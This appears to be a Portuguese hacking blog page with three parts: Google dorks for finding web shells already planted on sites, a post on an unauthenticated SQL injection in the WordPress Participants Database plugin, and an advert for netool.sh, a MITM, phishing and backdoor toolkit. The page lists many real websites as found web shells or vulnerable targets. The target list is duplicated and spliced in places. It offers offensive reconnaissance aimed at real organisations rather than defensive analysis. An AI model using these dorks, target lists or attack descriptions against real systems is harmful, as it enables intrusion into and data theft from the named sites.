PEI PEI PEI ACESSEI SUA 0xHACKINAGEM s2
0xDORK[0]: intext:"r57shell" || intext:"c99 shell" & intext:"safe_mode:" & -github -google -assembla -forum ext:php *2014
0xDEBUG SCANNER INURL:
0xBaixar:http://pastebin.com/TzijC99y
Array
(
[0] => Array
(
)
[host] => www.google.com.br
[dork] => intext%3A%22r57shell%22+%7C%7C+intext%3A%22c99+shell%22+%26+intext%3A%22safe_mode%3A%22++%26++-github+-google+-assembla+-forum+ext%3Aphp++%2A2014
[arquivo] => resultados.txt
[tipoerro] => 2
[exploit] =>
[achar] => safe_mode:
[cmd] => ping -c 1 _ALVO_
[ipProxy] =>
[porta] =>
[url] => /search?q=intext%3A%22r57shell%22+%7C%7C+intext%3A%22c99+shell%22+%26+intext%3A%22safe_mode%3A%22++%26++-github+-google+-assembla+-forum+ext%3Aphp++%2A2014&num=1900&btnG=Search
[port] => 80
)
0x[ALGUNS ACHADOS]
http://revistatucan.com/wp-content/themes/premiumnews/cache/external_b85021247782c61723a5a698c61eff52.php
http://www.chelovek-prazdnik.com/block/gallery/big/1553.php?delete
http://www.rodolatina.com.br/pt/noticias_detalhe.php?idProduto=133
http://www.minmini.com/admin/admin1.php?tmp
http://saxen-paris.com/css/_boot.php/sitemap%20
http://webcache.googleusercontent.com/search?q=cache:Fk9ziSWrgA4J:http://saxen-paris.com/css/_boot.php/sitemap%2520
http://srsoverseas.com.np/index.php?page=about_nepal
http://toy.az/index.php?news=2266
http://webcache.googleusercontent.com/search?q=cache:lYdPGLDr3KIJ:http://toy.az/index.php?news%3D2266
http://maheswaribrothers.com/r2.php?delete
http://jacobthomson.com/phpBB2/index.php
http://saxen-paris.com/css/_boot.php
http://www.minmini.com/admin/admin1.php?tmp
http://revistatucan.com/wp-content/themes/premiumnews/cache/external_b85021247782c61723a5a698c61eff52.php
http://www.chelovek-prazdnik.com/block/gallery/big/1553.php?delete
http://www.m-funtime.com/vb/faq.php?service
http://www.campaniameteo.it/immagini/immagini_articoli/r57.php
terça-feira, 10 de junho de 2014
Exploit Participants Database <= 1.5.4.8 Wordpress
0xParticipants Database
Wordpress Participants Database 1.5.4.8 - SQL Injection
Wordpress Participants Database 1.5.4.8 - SQL Injection
É um plugin Wordpress populares que oferece a funcionalidade necessária para construir e manter um banco de dados de pessoas.
- Detalhes sobre a Vulnerabilidade
1.Devido ao privilégio insuficiente verifica que é possível para anonymous(unauthenticated) para desencadear algumas ações administrativas, se algum dos códigos de acesso é utilizado (por exemplo, inscrição de página).
2. A ação "export CSV" tem um parâmetro chamado "query" que pode conter uma consulta SQL arbitrária.
Isso significa que um usuário não autenticado pode executar instruções SQL arbitrários (por exemplo, criar um usuário administrador, ler ou escrever arquivos ou executar código dependendo dos privilégios de usuário do MySQL).
----------------------------------------------------------------------------------------------------------------------------------
0xEXPLOIT:
http://www.exploit-db.com/exploits/33613/
0xDORK[0]:"Index of" "/wp-content/uploads/participants-database"
0xDORK[1]:inurl:"pdb-signup/" "PDB signup"
0xDORK[2]:inurl:"pdb-signup/" intitle:"PDB signup "
----------------------------------------------------------------------------------------------------------------------------------
[SCANNER INURL]
http://pastebin.com/TzijC99y
DEBUG:
Array
(
[0] => Array
(
)
[host] => www.google.com.br
[dork] => %22Index+of%22+%22%2Fwp-content%2Fuploads%2Fparticipants-database%22
[arquivo] => resultados.txt
[tipoerro] => 2
[exploit] =>
[achar] => Index of /wp-content/uploads/participants-database
[cmd] => ping -c 1 _ALVO_
[ipProxy] =>
[porta] =>
[url] => /search?q=%22Index+of%22+%22%2Fwp-content%2Fuploads%2Fparticipants-database%22&num=1900&btnG=Search
[port] => 80
)
RESULTADO PARCIAL:
http://webcache.googleusercontent.com/search?q=cache:kUL3synKmD0J:http://ebookily.org/xls/gassendi%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:WuVzKwF26PUJ:http://ebookily.org/xls/kathak-dress%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:OZ9vR__pkOgJ:http://www.tag.ubc.ca/iswnetwork.ca/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:MS8BxtAMxoAJ:http://www.shreeyashmatrimonial.com/kiran/d/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:l8rmzvOyZOkJ:http://www.younguttarakhand.org/wp/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:t43d046zpLQJ:http://partycrewgh.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:3kQuvZzwr6EJ:http://top3crew.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:gpBnRGnjbxcJ:http://sdara.com/sdarawebsite/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:nHBeHM57ojEJ:http://qsaudi.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:8yfwjuM8apgJ:http://www.blc-denver2.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:1uEWo4ctyKYJ:http://www.csa.us/www/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:G64f413f7V4J:http://www.gcm73.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:vSoBRrZja70J:http://www.powercollaborative.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:VyTtsWKYn2gJ:http://cccc-houston.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:BAh_697eT80J:http://www.mjbandofgold.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:Luc-zFtM2nEJ:http://www.gapfootball.org.au/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:R6DbMAITjosJ:http://www.4k-nn.ru/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:1ZHqjROYqJ8J:http://www.bcscpa.com/bcs-blog/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:-4lNmZAQJTYJ:http://graceland4kids.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:seg55mSkGSoJ:http://emeraldtigers.com.au/new_2013_website/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:nR8gLIEbCOEJ:http://artisanwineclub.com/index/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:cn3Yz66lQ-AJ:http://www.dsnyfamily.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:7W_fZ-33EVQJ:http://promovgroup.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:KT4lO7pNnswJ:http://www.rebbepiper.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:oujptjZTnnMJ:http://www.firt2013barcelona.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://www.thrombose-cancer.com/wp-content/uploads/participants-database/
http://www.iaodapca.org/wp-content/uploads/participants-database/
http://steppingstoneschina.net/wp-content/uploads/participants-database/
http://leg0lad.com/wp-content/uploads/participants-database/
http://www.nuis.co.il/wp-content/uploads/participants-database/
http://www.bikesforhumanity.com.au/wp-content/uploads/participants-database/
http://lanj.org/wp-content/uploads/participants-database/
http://gearupnv.org/wp-content/uploads/participants-database/
http://www.chruit.ch/wp-content/uploads/participants-database/
http://comartspartner.org/wp-content/uploads/participants-database/
http://thezonegroup.com/wp-content/uploads/participants-database/
http://www.alleywatch.com/wp-content/uploads/participants-database/
http://www.fundraisingwithcheese.com/wp-content/uploads/participants-database/
http://lifespringcommunitychurch.net/wp-content/uploads/participants-database/
http://www.wright-b-flyer.org/wp-content/uploads/participants-database/
http://www.fastenershows.com/wp-content/uploads/participants-database/
http://www.agavs.ca/wp-content/uploads/participants-database/
http://d70toastmasters.org.au/wp-content/uploads/participants-database/
http://lincolnillinois.com/wp-content/uploads/participants-database/
http://highbrookrotary.org.nz/wp-content/uploads/participants-database/
http://ptfund.org/wp-content/uploads/participants-database/
http://utahvalley360.com/wp-content/uploads/participants-database/
http://bamta.org/wp-content/uploads/participants-database/
http://nwapa.net/wp-content/uploads/participants-database/
http://victoryparkandsell.com/wp-content/uploads/participants-database/
http://nantmp.org.ng/wp-content/uploads/participants-database/
http://saafrica.org/wp-content/uploads/participants-database/
http://www.atpca.com.au/wp-content/uploads/participants-database/
http://uwtwinregistry.org/wp-content/uploads/participants-database/
http://swiggis-austin.org/wp-content/uploads/participants-database/
http://www.churchspirituallifenh.org/wp-content/uploads/participants-database/
http://mac.mb.ca/wp-content/uploads/participants-database/
http://www.mwphglotx.org/wp-content/uploads/participants-database/
http://www.diinstitute.org/wp-content/uploads/participants-database/
http://www.sbsonline.com.au/wp-content/uploads/participants-database/
http://soulmotion.com/wp-content/uploads/participants-database/
http://www.vancouveraikido.com/wp-content/uploads/participants-database/
http://www.isce.org.uk/wp-content/uploads/participants-database/
http://www.celinamercer.com/wp-content/uploads/participants-database/
http://www.cmtnl.ca/wp-content/uploads/participants-database/
http://www.sarorhttp://www.thrombose-cancer.com/wp-content/uploads/participants-database/
http://www.iaodapca.org/wp-content/uploads/participants-database/
http://steppingstoneschina.net/wp-content/uploads/participants-database/
http://leg0lad.com/wp-content/uploads/participants-database/
http://www.nuis.co.il/wp-content/uploads/participants-database/
http://www.bikesforhumanity.com.au/wp-content/uploads/participants-database/
http://lanj.org/wp-content/uploads/participants-database/
http://gearupnv.org/wp-content/uploads/participants-database/
http://www.chruit.ch/wp-content/uploads/participants-database/
http://comartspartner.org/wp-content/uploads/participants-database/
http://thezonegroup.com/wp-content/uploads/participants-database/
http://www.alleywatch.com/wp-content/uploads/participants-database/
http://www.fundraisingwithcheese.com/wp-content/uploads/participants-database/
http://lifespringcommunitychurch.net/wp-content/uploads/participants-database/
http://www.wright-b-flyer.org/wp-content/uploads/participants-database/
http://www.fastenershows.com/wp-content/uploads/participants-database/
http://www.agavs.ca/wp-content/uploads/participants-database/
http://d70toastmasters.org.au/wp-content/uploads/participants-database/
http://lincolnillinois.com/wp-content/uploads/participants-database/
http://highbrookrotary.org.nz/wp-content/uploads/participants-database/
http://ptfund.org/wp-content/uploads/participants-database/
http://utahvalley360.com/wp-content/uploads/participants-database/
http://bamta.org/wp-content/uploads/participants-database/
http://nwapa.net/wp-content/uploads/participants-database/
http://victoryparkandsell.com/wp-content/uploads/participants-database/
http://nantmp.org.ng/wp-content/uploads/participants-database/
http://saafrica.org/wp-content/uploads/participants-database/
http://www.atpca.com.au/wp-content/uploads/participants-database/
http://uwtwinregistry.org/wp-content/uploads/participants-database/
http://swiggis-austin.org/wp-content/uploads/participants-database/
http://www.churchspirituallifenh.org/wp-content/uploads/participants-database/
http://mac.mb.ca/wp-content/uploads/participants-database/
http://www.mwphglotx.org/wp-content/uploads/participants-database/
http://www.diinstitute.org/wp-content/uploads/participants-database/
http://www.sbsonline.com.au/wp-content/uploads/participants-database/
http://soulmotion.com/wp-content/uploads/participants-database/
http://www.vancouveraikido.com/wp-content/uploads/participants-database/
http://www.isce.org.uk/wp-content/uploads/participants-database/
http://www.celinamercer.com/wp-content/uploads/participants-database/
http://www.cmtnl.ca/wp-content/uploads/participants-database/
http://www.saroregon.org/wp-content/uploads/participants-database/
http://welshchoir.ca/wp-content/uploads/participants-database/
http://www.pnmc-hsr.org/wp-content/uploads/participants-database/
http://annwagner.com/wp-content/uploads/participants-database/
http://iyba.lasalle.org/wp-content/uploads/participants-database/
http://lpforest.org/wp-content/uploads/participants-database/
http://www.aedunlv.org/wp-content/uploads/participants-database/
http://walkabout.happeningfish.com/wp-content/uploads/participants-database/
http://www.northernarizonaaudubon.org/wp-content/uploads/participants-database/
http://claysportsirl.ie/wp-content/uploads/participants-database/
http://polyathlon-russia.com/wp-content/uploads/participants-database/
http://luislondon.com/wp-content/uploads/participants-database/
http://whatcomwritersandpublishers.org/wp-content/uploads/participants-database/
http://www.financesmediterranee.com/wp-content/uploads/participants-database/
http://bitroop1496.org/wp-content/uploads/participants-database/
http://www.firt2013barcelona.org/wp-content/uploads/participants-database/
http://www.rebbepiper.com/wp-content/uploads/participants-database/
http://promovgroup.com/wp-content/uploads/participants-database/
http://www.mjbandofgold.com/wp-content/uploads/participants-database/
http://cccc-houston.org/wp-content/uploads/participants-database/
http://www.powercollaborative.org/wp-content/uploads/participants-database/
http://www.isarmc.org/wp-content/uploads/participants-database/
http://www.blc-denver2.org/wp-content/uploads/participants-database/
http://qsaudi.com/wp-content/uploads/participants-database/
http://erosrws.com/wp-content/uploads/participants-database/
http://top3crew.com/wp-content/uploads/participants-database/
http://partycrewgh.org/wp-content/uploads/participants-database/egon.org/wp-content/uploads/participants-database/
http://welshchoir.ca/wp-content/uploads/participants-database/
http://www.pnmc-hsr.org/wp-content/uploads/participants-database/
http://annwagner.com/wp-content/uploads/participants-database/
http://iyba.lasalle.org/wp-content/uploads/participants-database/
http://lpforest.org/wp-content/uploads/participants-database/
http://www.aedunlv.org/wp-content/uploads/participants-database/
http://walkabout.happeningfish.com/wp-content/uploads/participants-database/
http://www.northernarizonaaudubon.org/wp-content/uploads/participants-database/
http://claysportsirl.ie/wp-content/uploads/participants-database/
http://polyathlon-russia.com/wp-content/uploads/participants-database/
http://luislondon.com/wp-content/uploads/participants-database/
http://whatcomwritersandpublishers.org/wp-content/uploads/participants-database/
http://www.financesmediterranee.com/wp-content/uploads/participants-database/
http://bitroop1496.org/wp-content/uploads/participants-database/
http://www.firt2013barcelona.org/wp-content/uploads/participants-database/
http://www.rebbepiper.com/wp-content/uploads/participants-database/
http://promovgroup.com/wp-content/uploads/participants-database/
http://www.mjbandofgold.com/wp-content/uploads/participants-database/
http://cccc-houston.org/wp-content/uploads/participants-database/
http://www.powercollaborative.org/wp-content/uploads/participants-database/
http://www.isarmc.org/wp-content/uploads/participants-database/
http://www.blc-denver2.org/wp-content/uploads/participants-database/
http://qsaudi.com/wp-content/uploads/participants-database/
http://erosrws.com/wp-content/uploads/participants-database/
http://top3crew.com/wp-content/uploads/participants-database/
http://partycrewgh.org/wp-content/uploads/participants-database/
netool.sh V3.4 [ r00tsect0r module ]
netool.sh é um script em bash para automatizar frameworks como Nmap, redes de deriva, sslstrip, Metasploit e Ettercap MITM ataques. esse script faz com que seja fácil, tarefas como SNIFFING tráfego TCP / UDP, ataques ManInTheMiddle, SSLsniff, falsificação de DNS, o outro módulos disponíveis são:
recuperar metadados do site alvo, ataques DoS dentro da rede externa / local,também usa macchanger para chamariz scans, usa o nmap para procurar uma porta especificada aberto no externo / lan local, mudança / ver o seu endereço mac, mudar o meu PC hostname, também pode
executar TCP / UDP pacotes manipulação usando etter.filters, também como a habilidade de capturar imagens de navegação na web-browser na máquina de destino sob ataque MITM e realiza uma varredura vuln ao web-site-alvo usando websecurify firefox-addon, também usos [msfpayload + + msfencode msfcli] para ter o controle remoto da máquina de destino, também
veio com [root3.rb] meterpreter ruby script de auxiliar, e um módulo para instalar / editar o script meterpreter e atualizar o banco de dados Metasploit automática, busca de alvos de geolocalização, ou use [webcrawler.py] módulo para procurar páginas de login de administrador,
directorys site, webshells.php plantada no site, scanner vulns upload de arquivo comum [LFI] e procurar XSS sites vuln usando idiotas google, também usa um módulo para automatizado alguns ataques mais MITM (dns-paródia + metasploit + phishing, e uma colecção de
(Metasploit) exploits automatizados ...
Dependências
- Nmap
- Ettercap
- Macchanger
- Metasploit
- Driftnet
- Apache2
- Sslstrip
- Python-beautifulsoup
Neste vídeo tutorial, vamos ver o funcionamento acompanhamento módulos:
- Backdoor PDF (Adobe Reader no Windows XP SP3)
- FakeUpdate (windows universal)
- java.jar phishing (OSX maçã, Linux, Windows, BSD, Solaris com java em execução)
- java_applet attacj "clonar um site e injetar um Iframe que aponta para a nossa aplicação" (sistemas afetados são: Apple OSX, Linux, Windows, BSD, Solaris)
- Ataque RDP D0S (denial-of-service Agains um host de destino em execução RDP proto)
------------------------------------------------------------------------------------------------------------------------------
Interface de usuário renovada
'clear script output'
'linux hashdump.rb added'
'PDF backdoor added'
Phishing modules improved
'External IP addr display'
'post-exploitation modules added'
------------------------------------------------------------------------------------------------------------------------------
Página do projeto
http://sourceforge.net/projects/netoolsh/?source=directory
WIKI:
http://sourceforge.net/p/netoolsh/wiki/netool.sh%20script%20project/
Assinar:
Postagens (Atom)